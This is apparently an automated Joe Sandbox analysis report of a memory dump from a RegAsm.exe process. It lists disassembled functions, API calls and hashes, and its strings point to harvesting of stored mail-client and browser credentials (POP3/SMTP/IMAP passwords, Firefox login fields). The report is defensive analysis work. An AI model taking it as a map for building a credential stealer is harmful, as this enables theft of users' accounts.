                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$QueryValue$CloseOpen
                                                                                                                                                                                • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                                • API String ID: 52435246-1534328989
                                                                                                                                                                                • Opcode ID: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                • Instruction ID: 5dbeba4814e3302d002d767d8bad135afcd275429644e03c8fd50da481ddfc04
                                                                                                                                                                                • Opcode Fuzzy Hash: 12cd8b5aae31976545c709c40371195406968ac39575e2cfa7706d38b8864041
                                                                                                                                                                                • Instruction Fuzzy Hash: 7C512DB1900218BAEB51EB51CD46FDEB77CEF04744F1481A7B908A6191DBB89B84CF98
                                                                                                                                                                                Function 00406DFC Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406E06
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406E23
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406E34
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406E41
                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406E54
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406E63
                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406E6C
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E74
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00406E80
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00406E8B
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406E94
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                                                • Opcode ID: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                • Instruction ID: a08a85c5be877f1b118c2cb4fdaf5607b5944e2b5e0e57495ee86e8d77b21b2f
                                                                                                                                                                                • Opcode Fuzzy Hash: 39ded4ddef3cc4279da07cdcd0aea708266a9fb2ccc9a22b6ca55318489a3f76
                                                                                                                                                                                • Instruction Fuzzy Hash: A9114F39501205EFE7506FB4EC8CB9E7BB8EF05315F144175F506E22A1DB3489158AA9
                                                                                                                                                                                Function 00406E9F Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00406EA7
                                                                                                                                                                                • strlen.MSVCRT ref: 00406EB4
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C360,?), ref: 00406EC3
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406ED0
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,?,?,?,?,0040C360,?), ref: 00406ED9
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406EE2
                                                                                                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00406EEB
                                                                                                                                                                                • CloseClipboard.USER32 ref: 00406EFB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3116012682-0
                                                                                                                                                                                • Opcode ID: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                • Instruction ID: 469d781c3ef94e65abf7249e996c377109e97d6fa28bdd4c6fbc6e531372765c
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f4c6f9f90a19b00bc9d76a8b9f701475e5d8083360905b26116392cc3d2db55
                                                                                                                                                                                • Instruction Fuzzy Hash: FFF0BB3F1002196BD2502FA5FC8CE5B776CDB85B56709413DF906D2252DE34980447F9
                                                                                                                                                                                Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                • API String ID: 3963849919-1658304561
                                                                                                                                                                                • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID: (yE$(yE$(yE
                                                                                                                                                                                • API String ID: 1865533344-362086290
                                                                                                                                                                                • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                Function 00442D8E Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • strlen.MSVCRT ref: 004431AD
                                                                                                                                                                                • strncmp.MSVCRT ref: 004431BD
                                                                                                                                                                                • memcpy.MSVCRT(?,00000002,00000000,?,?,?,?), ref: 00443239
                                                                                                                                                                                • atoi.MSVCRT(00000000,?,00000002,00000000,?,?,?,?), ref: 0044324A
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00443276
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                                                • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                • API String ID: 1895597112-3210201812
                                                                                                                                                                                • Opcode ID: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                • Instruction ID: 70136e13f872b1b8ab9f6622f700308096b0d0b5c52b82b67a7483c56e51dea4
                                                                                                                                                                                • Opcode Fuzzy Hash: 815def950afc24903c06c011c583ca89ddac7a924de85cd770a3f0370a713b87
                                                                                                                                                                                • Instruction Fuzzy Hash: 4AF10B718012589BDB22CF54C8487DEBBB4BB0278BF5485CAD8597B242C7B85B8DCF58
                                                                                                                                                                                Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                • API String ID: 1714764973-479759155
                                                                                                                                                                                • Opcode ID: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcc0da50847e261a1cb1e520a2a3ee9008523f466690a5f111f96f1dcf5fefb
                                                                                                                                                                                • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                • API String ID: 3137614212-1455797042
                                                                                                                                                                                • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                                                                                                                                                                • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                • API String ID: 2814039832-2206097438
                                                                                                                                                                                • Opcode ID: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                • Opcode Fuzzy Hash: 5e152c395e8870459aa5d43dede1428a4321a50c33a2bf693ec051cd41307c85
                                                                                                                                                                                • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                  • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                  • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                  • Part of subcall function 00408934: CloseHandle.KERNEL32(?), ref: 0040899C
                                                                                                                                                                                  • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                  • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                  • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                                                                                                                • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                • API String ID: 4171719235-3943159138
                                                                                                                                                                                • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                                                                                                                                                                • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                • API String ID: 1703216249-3046471546
                                                                                                                                                                                • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                                                                                                                                • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000,?,?,?,770145ED,?,00000000), ref: 00402533
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                • API String ID: 168965057-606283353
                                                                                                                                                                                • Opcode ID: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                • Opcode Fuzzy Hash: 81b74bbce62fc48dbc6e5ab3d42279a8276b8e6c9832af4fe3da39f0be11b360
                                                                                                                                                                                • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040FF0F
                                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                                                                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                                                                                                                                                                • SetFocus.USER32(00000000), ref: 0040FF39
                                                                                                                                                                                Strings
                                                                                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                                                                                                                                                                • {Unknown}, xrefs: 0040FD02
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                                                                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                                                • API String ID: 1428123949-3474136107
                                                                                                                                                                                • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
